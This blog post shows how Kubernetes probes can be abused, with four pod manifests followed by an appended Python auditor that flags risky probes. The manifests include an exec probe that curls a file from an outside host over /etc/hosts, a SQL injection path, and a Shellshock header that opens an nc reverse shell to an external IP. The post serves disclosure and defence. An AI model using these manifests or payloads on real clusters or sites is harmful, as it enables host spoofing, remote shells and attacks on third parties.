
Exploiting applications using liveness probes in Kubernetes

Philippe Bogaerts

Updated: Feb 11, 2023



Introduction

Startup, readiness, and liveness probes are well described in the Kubernetes documentation. The kubelet uses the probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic, and still alive. It is the kubelet that executes the probes, not the pod itself. Probes can be executed in different ways:

  • httpGet

  • exec

According to the reviewers, the problems described here are considered ‘as designed’, because you should download containers from a trusted source.

The examples below show that trusted sources of container images will not solve the problem, and neither will image scanning. To prevent an attack, it is mandatory to rigorously scan the Kubernetes pod and deployment manifests before deploying (and not to use any pre-canned examples :-)).


Examples


Example 1: Overwriting files on the pod filesystem. This code snippet overwrites the pod's /etc/hosts file to spoof hostnames.



kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
        - curl
        - www.xxxxx.com/host.txt
        - -o 
        - /etc/hosts
      initialDelaySeconds: 5
      periodSeconds: 5
EOF
      

Example 2: Installing applications in a pod at deployment time


kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get 
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get 
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF
      

Example 3: Attacking http(s) endpoints using SQL injection, XSS, …


kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
          - name: User-Agent
            value: xxxxxxxxx
EOF
           

Example 4: Attacking http(s) endpoints using Shellshock


apiVersion: v1
kind: Pod
metadata:
   name: radarhack-pod3
   labels:
      pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
      

Conclusion


Much has been written about securely deploying applications on Kubernetes. Keep in mind that every aspect needs full attention, and that generating and building Kubernetes manifests is also developing code.
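
The manifest check called for in the introduction, as an added example that is not part of the original post: a Python audit of probe definitions that flags exec probes running download, package or shell binaries, httpGet probes with an explicit host, and unusual characters in paths or header values. The binary list, the regular expression and the sample manifests are assumptions constructed for illustration; input is a JSON manifest (Kubernetes accepts JSON as well as YAML) so only the standard library is needed.

```python
import json
import re

PROBES = ("startupProbe", "readinessProbe", "livenessProbe")
# Assumption: binaries a health check rarely needs; shells are flagged for review.
RISKY_BINARIES = {"curl", "wget", "nc", "apt-get", "apt", "yum", "apk", "sh", "bash"}
# Assumption: characters that rarely belong in a probe path or header value.
SUSPICIOUS = re.compile(r"['\"<>;{}]|--|\(\)")

def pod_spec(obj):
    """Return the pod spec of a Pod, or of a Deployment-style spec.template."""
    spec = obj.get("spec", {})
    return spec.get("template", {}).get("spec", spec)

def audit(manifest_json):
    """Return (container, probe, finding) tuples for one JSON manifest."""
    findings = []
    for c in pod_spec(json.loads(manifest_json)).get("containers", []):
        for kind in PROBES:
            probe = c.get(kind) or {}
            cmd = probe.get("exec", {}).get("command", [])
            if cmd and cmd[0].strip().rsplit("/", 1)[-1] in RISKY_BINARIES:
                findings.append((c["name"], kind, "exec runs " + cmd[0].strip()))
            http = probe.get("httpGet", {})
            if http.get("host"):  # default target is the pod IP; a host redirects it
                findings.append((c["name"], kind, "httpGet.host set: " + http["host"]))
            values = [http.get("path", "")]
            values += [h.get("value", "") for h in http.get("httpHeaders", [])]
            if any(SUSPICIOUS.search(v) for v in values):
                findings.append((c["name"], kind, "suspicious path or header value"))
    return findings

def sample(name, probe):
    """Build a constructed single-container Pod manifest as JSON."""
    return json.dumps({"kind": "Pod", "spec": {"containers": [
        {"name": name, "image": "ubuntu", "livenessProbe": probe}]}})

SAMPLES = [  # constructed inputs modelled on Examples 1 and 3, plus a benign probe
    sample("exec-curl", {"exec": {"command":
        ["curl", "placeholder.example/host.txt", "-o", "/etc/hosts"]}}),
    sample("http-ext", {"httpGet":
        {"host": "placeholder.example", "path": "/?'OR 1=1--", "port": 8080}}),
    sample("benign", {"httpGet": {"path": "/healthz", "port": 8080}}),
]

if __name__ == "__main__":
    for manifest in SAMPLES:
        print(audit(manifest))
```

A check like this belongs in CI or an admission step, with any finding treated as a prompt for manual review rather than an automatic verdict.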
